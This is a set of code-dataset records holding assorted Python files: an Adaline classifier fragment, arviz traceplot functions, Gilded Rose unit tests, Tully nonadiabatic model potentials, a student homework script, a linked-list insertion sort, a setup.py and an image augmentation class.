self.c = np.insert(data,0,1)\r\n return self.stepFunction(self.c.dot(self.W))\r\n else:\r\n self.c = np.ones((len(data),1), dtype=int)\r\n self.c = np.c_[(self.c,data)]\r\n return [self.stepFunction(self.W.dot(x)) for x in self.c]\r\n \r\n def stepFunction(self, u):\r\n return 1 if u >= 0 else 0\r\n ","sub_path":"Sistemas Inteligentes - Perceptron/adaline.py","file_name":"adaline.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"604278972","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .kdeplot import fast_kde\nfrom .plot_utils import make_2d, get_bins, _scale_text\nfrom ..utils import get_varnames, trace_to_dataframe, untransform_varnames\nfrom ..compat import altair as alt\n\n\ndef _var_to_traceplot(dataframe, varname, brush):\n df = dataframe.reset_index().melt(id_vars='index')\n\n trace = alt.Chart().mark_line().encode(\n alt.X('index:Q', title='Sample'),\n alt.Y('value:Q', title=varname),\n color=alt.Color('variable:N'),\n opacity=alt.value(0.4 + 0.6 / len(df.variable.unique())),\n ).properties(\n selection=brush,\n width=600,\n height=200\n )\n\n if all(np.issubdtype(dtype, np.dtype('int')) for dtype in dataframe.dtypes.values):\n base = alt.Chart().mark_bar()\n else:\n base = alt.Chart().mark_line()\n\n kde = base.encode(\n x=alt.X('value:Q', bin=alt.Bin(maxbins=100), title=varname),\n y=alt.Y('count():Q', title='Number of Samples'),\n color=alt.Color('variable:N'),\n ).transform_filter(\n brush.ref()\n ).properties(\n height=200\n )\n\n return alt.hconcat(kde, trace, data=df)\n\n\ndef traceplot_altair(dataframe):\n \"\"\"Interactive traceplot using Altair\n \"\"\"\n all_vars, _ = untransform_varnames(dataframe.columns)\n brush = alt.selection_interval(encodings=['x'])\n charts = []\n for base_name, varnames in all_vars.items():\n charts.append(_var_to_traceplot(dataframe.loc[:, varnames], base_name, brush))\n return alt.vconcat(*charts)\n\n\ndef traceplot(trace, varnames=None, figsize=None, textsize=None, lines=None, combined=False,\n grid=True, shade=0.35, priors=None, prior_shade=1, prior_style='--', bw=4.5,\n skip_first=0, ax=None, altair=False):\n \"\"\"Plot samples histograms and values.\n\n 
Parameters\n ----------\n trace : Pandas DataFrame or PyMC3 trace\n Posterior samples\n varnames : list of variable names\n Variables to be plotted, if None all variable are plotted\n figsize : figure size tuple\n If None, size is (12, num of variables * 2) inch\n textsize: int\n Text size for labels, titles and lines. If None it will be autoscaled based on figsize.\n lines : dict\n Dictionary of variable name / value to be overplotted as vertical lines to the posteriors\n and horizontal lines on sample values e.g. mean of posteriors, true values of a simulation.\n If an array of values, line colors are matched to posterior colors. Otherwise, a default\n `C3` line.\n combined : bool\n Flag for combining multiple chains into a single chain. If False (default), chains will be\n plotted separately.\n grid : bool\n Flag for adding gridlines to histogram. Defaults to True.\n shade : float\n Alpha blending value for plot line. Defaults to 0.35.\n priors : iterable of scipy distributions\n Prior distribution(s) to be plotted alongside posterior. Defaults to None (no prior plots).\n prior_Shade : float\n Alpha blending value for prior plot. Defaults to 1.\n prior_style : str\n Line style for prior plot. Defaults to '--' (dashed line).\n bw : float\n Bandwidth scaling factor for the KDE. Should be larger than 0. The higher this number the\n smoother the KDE will be. Defaults to 4.5 which is essentially the same as the Scott's rule\n of thumb (the default rule used by SciPy).\n skip_first : int\n Number of first samples not shown in plots (burn-in).\n ax : axes\n Matplotlib axes. Accepts an array of axes, e.g.:\n\n >>> fig, axs = plt.subplots(3, 2) # 3 RVs\n >>> pymc3.traceplot(trace, ax=axs)\n\n Creates own axes by default.\n altair : bool\n Should returned plot be an altair chart.\n\n Returns\n -------\n\n ax : matplotlib axes\n\n \"\"\"\n trace = trace_to_dataframe(trace[skip_first:], combined=combined)\n varnames = get_varnames(trace, varnames)\n\n if altair:\n return traceplot_altair(trace.loc[:, varnames])\n\n if figsize is None:\n figsize = (12, len(varnames) * 2)\n\n textsize, linewidth, _ = _scale_text(figsize, textsize=textsize, scale_ratio=1)\n\n _, ax = plt.subplots(len(varnames), 2, squeeze=False, figsize=figsize)\n\n for i, varname in enumerate(varnames):\n if priors is not None:\n prior = priors[i]\n else:\n prior = None\n\n data = trace[varname].values\n data = np.squeeze(data)\n data = make_2d(data)\n width = len(data)\n if data.dtype.kind == 'i':\n hist_objs = _histplot_op(ax[i, 0], data, shade, prior, prior_shade, prior_style)\n colors = [h[-1][0].get_facecolor() for h in hist_objs]\n else:\n artists = _kdeplot_op(ax[i, 0], data, bw, linewidth, prior, prior_shade, prior_style)[0]\n colors = [a[0].get_color() for a in artists]\n ax[i, 0].set_title(varname, fontsize=textsize)\n ax[i, 0].grid(grid)\n ax[i, 1].set_title(varname, fontsize=textsize)\n ax[i, 1].plot(range(width), data, lw=linewidth, alpha=shade)\n\n ax[i, 0].set_yticks([])\n ax[i, 0].tick_params(labelsize=textsize)\n ax[i, 1].tick_params(labelsize=textsize)\n\n if lines:\n try:\n if isinstance(lines[varname], (float, int)):\n line_values, colors = [lines[varname]], ['C3']\n else:\n line_values = np.atleast_1d(lines[varname]).ravel()\n if len(colors) != len(line_values):\n raise AssertionError(\"An incorrect number of lines was specified for \"\n \"'{}'. 
Expected an iterable of length {} or to \"\n \" a scalar\".format(varname, len(colors)))\n for color, line_value in zip(colors, line_values):\n ax[i, 0].axvline(x=line_value, color=color, lw=1.5, alpha=0.75)\n ax[i, 1].axhline(y=line_value, color=color, lw=1.5, alpha=shade)\n except KeyError:\n pass\n\n ax[i, 0].set_ylim(ymin=0)\n plt.tight_layout()\n return ax\n\n\ndef _histplot_op(ax, data, shade=.35, prior=None, prior_shade=1, prior_style='--'):\n \"\"\"Add a histogram for each column of the data to the provided axes.\"\"\"\n hists = []\n for column in data.T:\n bins = get_bins(column)\n hists.append(ax.hist(column, bins=bins, alpha=shade, align='left',\n density=True))\n if prior is not None:\n x_sample = prior.rvs(1000)\n x = np.arange(x_sample.min(), x_sample.max())\n pmf = prior.pmf(x)\n ax.step(x, pmf, where='mid', alpha=prior_shade, ls=prior_style)\n xticks = get_bins(data, max_bins=10, fenceposts=1)\n ax.set_xticks(xticks)\n\n return hists\n\n\ndef _kdeplot_op(ax, data, bw, linewidth, prior=None, prior_shade=1, prior_style='--'):\n \"\"\"Get a list of density and likelihood plots, if a prior is provided.\"\"\"\n densities = []\n priors = []\n errored = []\n for i, col in enumerate(data.T):\n try:\n density, lower, upper = fast_kde(col, bw=bw)\n x = np.linspace(lower, upper, len(density))\n densities.append(ax.plot(x, density, lw=linewidth))\n if prior is not None:\n x_sample = prior.rvs(10000)\n x = np.linspace(x_sample.min(), x_sample.max(), 1000)\n pdf = prior.pdf(x)\n priors.append(ax.plot(x, pdf, alpha=prior_shade, ls=prior_style))\n\n except ValueError:\n errored.append(str(i))\n\n if errored:\n ax.text(.27, .47, 'WARNING: KDE plot failed for: ' + ','.join(errored),\n bbox={'facecolor': 'red', 'alpha': 0.5, 'pad': 10},\n style='italic')\n\n return densities, priors\n","sub_path":"arviz/plots/traceplot.py","file_name":"traceplot.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486467598","text":"# -*- coding: utf-8 -*-\nimport unittest\n\nfrom gilded_rose import Item, ConcertItem, GildedRose\n\nSELL_IN_DUE = 0\nMAX_QUANTITY = 50\nMIN_QUANTITY = 0\n\nclass GildedRoseTest(unittest.TestCase):\n\n def setUp(self):\n self.aged_item_name = \"Aged Brie\"\n self.legendary_item_name = \"Sulfuras, Hand of Ragnaros\"\n self.concert_item_name = \"Backstage passes to a TAFKAL80ETC concert\"\n self.base_item_name = \"+5 Dexterity Vest\"\n self.conjured_item_name = \"Conjured Mana Cake\"\n\n # Concert Item tests\n def test_concert_item_update_returns_updated_quality_under_max_quantity(self):\n set_quality = 48\n set_sell_in = 4\n concert = ConcertItem(Item(self.concert_item_name, set_sell_in, set_quality))\n\n concert.update()\n\n self.assertEquals(concert.item.quality, MAX_QUANTITY)\n\n def test_concert_item_update_returns_updated_quality(self):\n set_quality = 30\n set_sell_in = 4\n expected_increase = 3\n concert = ConcertItem(Item(self.concert_item_name, set_sell_in, set_quality))\n\n concert.update()\n\n self.assertEquals(concert.item.quality, set_quality + expected_increase)\n\n # gilded rose requirements to tests\n def test_item_when_update_quality_called_sell_in_reduces(self):\n items = [Item(self.base_item_name, SELL_IN_DUE, 1)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].sell_in, -1)\n\n def test_item_when_update_quality_called_quality_decrease(self):\n items = [Item(self.base_item_name, 1, 1)]\n gilded_rose = 
GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MIN_QUANTITY)\n\n def test_item_quality_can_not_be_negative(self):\n items = [Item(self.base_item_name, SELL_IN_DUE, MIN_QUANTITY)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MIN_QUANTITY)\n\n def test_item_when_sell_in_date_passed_quality_degrades_by_two(self):\n set_quantity = 10\n expected_decrease = 2\n items = [Item(self.base_item_name, SELL_IN_DUE, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity - expected_decrease)\n\n def test_aged_item_when_sell_by_date_passed_increases_quality_by_two(self):\n set_quantity = 10\n expected_incremental = 2\n items = [Item(self.aged_item_name, SELL_IN_DUE, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity + expected_incremental)\n\n def test_aged_item_quality_can_not_exceed_fifty(self):\n items = [Item(self.aged_item_name, SELL_IN_DUE, MAX_QUANTITY)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MAX_QUANTITY)\n\n def test_legendary_item_never_decreases_quality(self):\n set_quantity = 80\n items = [Item(self.legendary_item_name, SELL_IN_DUE, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity)\n\n def test_concert_item_when_sell_in_more_than_ten_days_quality_increase_by_one(self):\n set_quantity = 20\n set_sell_in = 15\n expected_incremental = 1\n items = [Item(self.concert_item_name, set_sell_in, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity + expected_incremental)\n\n def test_concert_item_when_sell_in_less_than_ten_days_quality_increase_by_two(self):\n set_quantity = 20\n ten_days_left = 10\n expected_incremental = 2\n items = [Item(self.concert_item_name, ten_days_left, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity + expected_incremental)\n\n\n def test_concert_item_when_sell_in_left_five_days_quality_increase_by_three(self):\n set_quantity = 20\n five_days_left = 5\n expected_incremental = 3\n items = [Item(self.concert_item_name, five_days_left, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity + expected_incremental)\n\n def test_concert_item_when_date_passes_quality_set_zero(self):\n set_quantity = 20\n items = [Item(self.concert_item_name, SELL_IN_DUE, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MIN_QUANTITY)\n\n def test_conjured_item_drops_value_twice_faster(self):\n set_sell_in = 10\n set_quality = 20\n expected_decrease = 2\n items = [Item(self.conjured_item_name, set_sell_in, set_quality)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quality - expected_decrease)\n\n def test_conjured_item_quality_can_not_be_negative(self):\n items = [Item(self.conjured_item_name, SELL_IN_DUE, MIN_QUANTITY)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MIN_QUANTITY)\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"python/test_gilded_rose.py","file_name":"test_gilded_rose.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"321356832","text":"## @package tullymodels\n# Implementations of the one-dimensional two-state models Tully demonstrated FSSH on in Tully, J.C. J. Chem. Phys. 1990 93 1061.\n\nimport numpy as np\nimport math as m\n\n# Here are some helper functions that pad the model problems with fake electronic states.\n# Useful for debugging, so keeping it around\n'''\ndef pad_model(nstates, diags):\n def V_decorator(func):\n def wrapper(*args, **kwargs):\n out = func(*args, **kwargs)\n oldnstates = out.shape[0]\n out = np.pad(out, (0,nstates), 'constant')\n if nstates > 1:\n for i in range(nstates):\n out[oldnstates+i,oldnstates+i] = diags[i]\n else:\n out[-1,-1] = diags\n return out\n return wrapper\n\n def dV_decorator(func):\n def wrapper(*args, **kwargs):\n out = func(*args, **kwargs)\n nout = np.zeros([out.shape[0], out.shape[1]+nstates, out.shape[2]+nstates])\n nout[:,0:out.shape[1],0:out.shape[2]] += out[:,:,:]\n return nout\n return wrapper\n\n def nstates_decorator(func):\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs) + nstates\n return wrapper\n\n def class_decorator(cls):\n class padded_model(cls):\n def __init__(self, *args, **kwargs):\n cls.__init__(self, *args, **kwargs)\n\n self.V = V_decorator(self.V)\n self.dV = dV_decorator(self.dV)\n self.nstates = nstates_decorator(self.nstates)\n\n return padded_model\n return class_decorator\n'''\n\n## Tunneling through a single barrier model used in Tully's 1990 JCP\n#\n# \\f[\n# V_{11} = \\left\\{ \\begin{array}{cr}\n# A (1 - e^{Bx}) & x < 0 \\\\\n# -A (1 - e^{-Bx}) & x > 0\n# \\end{array} \\right.\n# \\f]\n# \\f[ V_{22} = -V_{11} \\f]\n# \\f[ V_{12} = V_{21} = C e^{-D x^2} \\f]\nclass TullySimpleAvoidedCrossing(object):\n ## Constructor that defaults to the values reported in Tully's 1990 JCP\n def __init__(self, a = 0.01, b = 1.6, c = 0.005, d = 1.0):\n self.A = a\n self.B = b\n self.C = c\n self.D = d\n\n ## \\f$V(x)\\f$\n def V(self, x):\n v11 = m.copysign(self.A, x) * ( 1.0 - m.exp(-self.B * abs(x)) )\n v22 = -v11\n v12 = self.C * m.exp(-self.D * x * x)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out\n\n ## \\f$\\nabla V(x)\\f$\n def dV(self, x):\n v11 = self.A * self.B * m.exp(-self.B * abs(x))\n v22 = -v11\n v12 = -2.0 * self.C * self.D * x * m.exp(-self.D * x * x)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out.reshape([1, 2, 2])\n\n def nstates(self):\n return 2\n\n def ndim(self):\n return 1\n\n## Tunneling through a double avoided crossing used in Tully's 1990 JCP\n#\n# \\f[ V_{11} = 0 \\f]\n# \\f[ V_{22} = -A e^{-Bx^2} + E_0 \\f]\n# \\f[ V_{12} = V_{21} = C e^{-D x^2} \\f]\nclass TullyDualAvoidedCrossing(object):\n ## Constructor that defaults to the values reported in Tully's 1990 JCP\n def __init__(self, a = 0.1, b = 0.28, c = 0.015, d = 0.06, e = 0.05):\n self.A = a\n self.B = b\n self.C = c\n self.D = d\n self.E0 = e\n\n ## \\f$V(x)\\f$\n def V(self, x):\n v11 = 0.0\n v22 = - self.A * m.exp(-self.B * x * x) + self.E0\n v12 = self.C * m.exp(-self.D * x * x)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out\n\n ## \\f$\\nabla V(x)\\f$\n def dV(self, x):\n v11 = 0.0\n v22 = 2.0 * self.A * self.B * x * m.exp(-self.B * x * x)\n v12 = -2.0 * self.C * self.D * x * m.exp(-self.D * x * x)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return 
out.reshape([1, 2, 2])\n\n def nstates(self):\n return 2\n\n def ndim(self):\n return 1\n\n## Model with extended coupling and the possibility of reflection. The most challenging of the\n# models used in Tully's 1990 JCP\n# \\f[ V_{11} = A \\f]\n# \\f[ V_{22} = -A \\f]\n# \\f[\n# V_{12} = \\left\\{ \\begin{array}{cr}\n# B e^{Cx} & x < 0 \\\\\n# B \\left( 2 - e^{-Cx} \\right) & x > 0\n# \\end{array} \\right.\n# \\f]\nclass TullyExtendedCouplingReflection(object):\n ## Constructor that defaults to the values reported in Tully's 1990 JCP\n def __init__(self, a = 0.0006, b = 0.10, c = 0.90):\n self.A = a\n self.B = b\n self.C = c\n\n ## \\f$V(x)\\f$\n def V(self, x):\n v11 = self.A\n v22 = -self.A\n v12 = m.exp(-abs(x)*self.C)\n if x < 0:\n v12 = self.B * v12\n else:\n v12 = self.B * (2.0 - v12)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out\n\n ## \\f$\\nabla V(x)\\f$\n def dV(self, x):\n v11 = 0.0\n v22 = 0.0\n v12 = self.B * self.C * m.exp(-self.C * abs(x))\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out.reshape([1, 2, 2])\n\n def nstates(self):\n return 2\n\n def ndim(self):\n return 1\n\nclass SuperExchange(object):\n ## Constructor defaults to Prezhdo paper on GFSH\n def __init__(self, v11 = 0.0, v22 = 0.01, v33 = 0.005, v12 = 0.001, v23 = 0.01):\n self.v11 = v11\n self.v22 = v22\n self.v33 = v33\n self.v12 = v12\n self.v23 = v23\n\n ## \\f$V(x)\\f$\n def V(self, x):\n v12 = self.v12 * m.exp(-0.5*x*x)\n v23 = self.v23 * m.exp(-0.5*x*x)\n\n return np.array([ [self.v11, v12, 0.0],\n [v12, self.v22, v23],\n [0.0, v23, self.v33] ])\n\n ## \\f$ \\nabla V(x)\\f$\n def dV(self, x):\n v12 = -x * self.v12 * m.exp(-0.5*x*x)\n v23 = -x * self.v23 * m.exp(-0.5*x*x)\n out = np.array([ [0.0, v12, 0.0],\n [v12, 0.0, v23],\n [0.0, v23, 0.0] ])\n\n return out.reshape([1, 3, 3])\n\n def nstates(self):\n return 3\n\n def ndim(self):\n return 1\n\nmodeldict = { \"simple\" : TullySimpleAvoidedCrossing,\n \"dual\" : TullyDualAvoidedCrossing,\n \"extended\" : TullyExtendedCouplingReflection,\n \"super\" : SuperExchange }\n","sub_path":"tullymodels.py","file_name":"tullymodels.py","file_ext":"py","file_size_in_byte":6366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"117218451","text":"#Pranshav Thakkar\n#CS1301 Section A\n# pthakkar7@gatech.edu\n# I worked on this assignment alone, using only this semester's course resources.\n\nprint(\"First, we will convert speed in machs to feet per second.\")\n\ndef machToFPS():\n mach = float(input(\"Enter speed in machs\"))\n FPS = mach * 1116.4370079\n print(\"Your speed in Feet/Second is:\", FPS, \"feet/second\")\n\n#machToFPS()\n\nprint(\"Now, we will calculate the volume of a square pyramid.\")\n\ndef sqPyramidVolume():\n base = float(input(\"Please enter the length of the base in inches\"))\n height = float(input(\"Please enter the height of the pyramid in inches\")) \n volume = (base * base * height)/3\n print(\"The volume of the square pyramid is\",volume,\"inches cubed\")\n \n#sqPyramidVolume() \n\nprint(\"Next, we will convert any number of cents entered into dollars, quarters, dimes, nickels and pennies.\")\n\ndef makeChange():\n cents = int(input(\"Enter the number of cents\"))\n dollars = int(cents/100)\n cents1 = int(cents%100)\n quarters = int(cents1/25)\n cents2 = int(cents1%25)\n dimes = int(cents2/10)\n cents3 = int(cents2%10)\n nickels = int(cents3/5)\n pennies = int(cents3%5)\n print(\"You 
have\",dollars,\"dollar(s),\",quarters,\"quarter(s),\",dimes,\"dime(s),\",nickels,\"nickel(s),and\",pennies,\"penny(ies).\")\n\n#makeChange() \n\nprint(\"Finally, we will calculate your PPI ratio.\")\n\ndef PPIIndex():\n    weight = float(input(\"Please enter your weight in pounds\"))\n    height = float(input(\"Please enter your height in inches\"))\n    PPI = (weight/height)*1.125\n    print(\"Your corrected PPI is {0:.1f}.\".format(PPI))\n\n#PPIIndex()\n\n    \n","sub_path":"HW1/HW1.py","file_name":"HW1.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"433280250","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'James Z'\n'''\nbuild train_sample\n'''\n\nimport csv\n\ncsvfile = file('train_sample.csv', 'w+')\nwriter1 = csv.writer(csvfile)\ntrain_set1 = set()\ntrain_set0 = set()\n\n# csv.reader expects a file object (or other iterable of lines), not a filename string\nfor line in csv.reader(open('./18_positive_sample.csv', 'rb')):\n\ttrain_set1.add((line[0], line[1]))\nfor line in csv.reader(open('./sample_18_negative_sample.csv', 'rb')):\n\ttrain_set0.add((line[0], line[1]))\n\nfor line in csv.reader(open('./data_feature.csv', 'rb')):\n\tif (line[0], line[1]) in train_set0:\n\t\tline.append('0')\n\t\twriter1.writerow(line)\n\telif (line[0], line[1]) in train_set1:\n\t\tline.append('1')\n\t\twriter1.writerow(line)\n\ncsvfile.close()","sub_path":"build_train_sample.py","file_name":"build_train_sample.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"531883174","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n\tdef insertionSortList(self, head: ListNode) -> ListNode:\n\t\tif not head:\n\t\t\treturn None\n\t\tl = self.insertionSortList(head.next)\n\t\thead.next = None\n\t\treturn self.insert(l, head)\n\t\n\tdef insert(self, h, node):\n\t\tif not h:\n\t\t\treturn node\n\t\tdummyHead = ListNode(None)\n\t\tdummyHead.next = h\n\t\tcurr, prev = h, dummyHead\n\t\twhile curr and curr.val <= node.val:\n\t\t\tprev = curr\n\t\t\tcurr = curr.next\n\t\tprev.next = node\n\t\tnode.next = curr\n\t\treturn dummyHead.next\n\n\n\n","sub_path":"linked-list/insertion-sort-list.py","file_name":"insertion-sort-list.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"375234081","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup\n\nCLASSIFIERS = \"\"\"\nProgramming Language :: Python\nTopic :: Software Development :: Testing\n\"\"\"[1:-1]\n\nsetup(\n    name = 'robotframework-httplibrary',\n    version = \"0.0.1\",\n    description = 'Robot Framework wrapper for livetest',\n    long_description = \"Robot Framework wrapper for livetest\",\n    author = 'Filip Noetzel',\n    author_email = 'filip+rfhttplibrary@j03.de',\n    url = 'http://code.google.com/p/robotframework-seleniumlibrary',\n    license = 'Beerware',\n    keywords = 'robotframework testing testautomation web http livetest webtest',\n    platforms = 'any',\n    classifiers = CLASSIFIERS.splitlines(),\n    package_dir = {'' : 'src'},\n    install_requires = ['robotframework', 'livetest'],\n    packages = ['HttpLibrary']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"254725457","text":"\"\"\"\nThe typology-mover script takes the typology file stored in 
the keylist directory and places it in the scenario folder.\n\"\"\"\n\n\n\n\nimport os\nimport cea.config\nimport cea.inputlocator\n\n__author__ = \"Justin McCarty\"\n__copyright__ = \"\"\n__credits__ = [\"Justin McCarty\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"\"\n__email__ = \"\"\n__status__ = \"\"\n\ndef copy_typology_file(source_typology_file, locator):\n \"\"\"\n Copy the typology file to the scenario's inputs from the experiment's folder.\n\n :param string source_typology_file: path to a typology file (``*.dbf``)\n :param cea.inputlocator.InputLocator locator: use the InputLocator to find output path\n :return: (this script doesn't return anything)\n \"\"\"\n from shutil import copy\n assert os.path.exists(source_typology_file), \"Could not find new typology file: {source_typology_file}\".format(\n source_typology_file=source_typology_file\n )\n copy(source_typology_file, locator.get_building_typology())\n print(\"Set typology for scenario <{scenario}> to {source_typology_file}\".format(\n scenario=os.path.basename(locator.scenario),\n source_typology_file=source_typology_file\n ))\n\n\ndef main(path,config):\n \"\"\"\n Assign a new typology file to the input folder.\n\n :param cea.config.Configuration config: Configuration object for this script\n :return:\n \"\"\"\n assert os.path.exists(config.scenario), 'Scenario not found: %s' % config.scenario\n locator = cea.inputlocator.InputLocator(config.scenario)\n\n copy_typology_file(path, locator)\n\n\nif __name__ == '__main__':\n main(cea.config.Configuration())\n","sub_path":"cea/bigmacc/deprecated/typology_mover.py","file_name":"typology_mover.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"385079920","text":"from astropy.io import fits\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom math import sqrt, log, log10\r\n\r\ndef ast_mag(filename, star_x_coord, star_y_coord, star_w, star_mag, ast_x_coord, ast_y_coord, ast_w, blank_x_coord, blank_y_coord):\r\n im = fits.getdata(filename)\r\n # extract a box of the star's width centered on its x-y coordinates from the image\r\n box_r = int(star_w/2)\r\n star_box = im[star_y_coord-box_r:star_y_coord+box_r+1, star_x_coord-box_r:star_x_coord+box_r+1]\r\n ##print(star_box)\r\n # sum the pixel counts of all pixels inside the box (\"star+sky\")\r\n star_sky = np.sum(star_box)\r\n ##print(star_sky)\r\n # extract a 3X3 box of blank sky centered at the blank x-y coordinates\r\n box_r = 1\r\n blank_box = im[blank_y_coord-box_r:blank_y_coord+box_r+1, blank_x_coord-box_r:blank_x_coord+box_r+1]\r\n ##print(blank_box)\r\n # determine the average pixel count of all pixels inside that box (\"avgSky\")\r\n avgSky = np.sum(blank_box)/9 # total of 9 pixels (3X3)\r\n # calculate the pixel counts for just the star (\"signal\")\r\n n_ap = (star_w)**2\r\n ##print(n_ap)\r\n star_sig = star_sky-avgSky*n_ap\r\n ##print(star_sig)\r\n # determine constant value from the equation mag = -2.5*log(signal, 10)+const\r\n const = 2.5*log(star_sig, 10) + star_mag\r\n ##print(const)\r\n ##print(\"\")\r\n\r\n # extract a box of the asteroid's width centered on its x-y coordinates\r\n box_r = int(ast_w/2)\r\n ast_box = im[ast_y_coord-box_r:ast_y_coord+box_r+1, ast_x_coord-box_r:ast_x_coord+box_r+1]\r\n ##print(ast_box)\r\n # sum asteroid+sky\r\n ast_sky = np.sum(ast_box)\r\n ##print(ast_sky)\r\n # 3X3 box of blank sky is the same as before\r\n # avgSky is the same as before\r\n # 
calculate the asteroid's signal\r\n    n_ap = (ast_w)**2\r\n    ##print(n_ap)\r\n    ast_sig = ast_sky-avgSky*n_ap\r\n    ##print(ast_sig)\r\n    \r\n    # find asteroid's magnitude\r\n    mag = -2.5*log(ast_sig, 10)+const\r\n    return mag\r\n\r\n# 18.5008\r\nprint(ast_mag(\"sampleimage.fits\", 173, 342, 5, 15.26, 351, 154, 3, 200, 200))\r\n# 18.7534\r\nprint(ast_mag(\"sampleimage.fits\", 355, 285, 5, 16.11, 351, 154, 3, 200, 200))\r\n","sub_path":"Coding/Python HW 2/diff_photometry.py","file_name":"diff_photometry.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"265442795","text":"import cv2\nimport numpy as np\nfrom math import ceil, floor\n\nclass Augmentation:\n\n    def __init__(self):\n        # __init__ must not return a value; 'return 0' raises a TypeError\n        pass\n\n\n    # NOTE: IMAGE_SIZE is assumed to be defined at module level elsewhere\n    def get_translate_parameters(self, index):\n        if index == 0: # Translate left 20 percent\n            offset = np.array([0.0, 0.2], dtype=np.float32)\n            size = np.array([IMAGE_SIZE, ceil(0.8 * IMAGE_SIZE)], dtype=np.int32)\n            w_start = 0\n            w_end = int(ceil(0.8 * IMAGE_SIZE))\n            h_start = 0\n            h_end = IMAGE_SIZE\n        elif index == 1: # Translate right 20 percent\n            offset = np.array([0.0, -0.2], dtype=np.float32)\n            size = np.array([IMAGE_SIZE, ceil(0.8 * IMAGE_SIZE)], dtype=np.int32)\n            w_start = int(floor((1 - 0.8) * IMAGE_SIZE))\n            w_end = IMAGE_SIZE\n            h_start = 0\n            h_end = IMAGE_SIZE\n        elif index == 2: # Translate top 20 percent\n            offset = np.array([0.2, 0.0], dtype=np.float32)\n            size = np.array([ceil(0.8 * IMAGE_SIZE), IMAGE_SIZE], dtype=np.int32)\n            w_start = 0\n            w_end = IMAGE_SIZE\n            h_start = 0\n            h_end = int(ceil(0.8 * IMAGE_SIZE))\n        else: # Translate bottom 20 percent\n            offset = np.array([-0.2, 0.0], dtype=np.float32)\n            size = np.array([ceil(0.8 * IMAGE_SIZE), IMAGE_SIZE], dtype=np.int32)\n            w_start = 0\n            w_end = IMAGE_SIZE\n            h_start = int(floor((1 - 0.8) * IMAGE_SIZE))\n            h_end = IMAGE_SIZE\n\n        return offset, size, w_start, w_end, h_start, h_end\n\n    def get_mask_coord(self, imshape):\n        vertices = np.array([[(0.09 * imshape[1], 0.99 * imshape[0]),\n                              (0.43 * imshape[1], 0.32 * imshape[0]),\n                              (0.56 * imshape[1], 0.32 * imshape[0]),\n                              (0.85 * imshape[1], 0.99 * imshape[0])]], dtype=np.int32)\n        return vertices\n\n    def get_perspective_matrices(self, X_img):\n        offset = 15\n        img_size = (X_img.shape[1], X_img.shape[0])\n\n        # Estimate the coordinates of object of interest inside the image.\n        src = np.float32(self.get_mask_coord(X_img.shape))\n        dst = np.float32([[offset, img_size[1]], [offset, 0], [img_size[0] - offset, 0],\n                          [img_size[0] - offset, img_size[1]]])\n\n        perspective_matrix = cv2.getPerspectiveTransform(src, dst)\n        return perspective_matrix\n\n    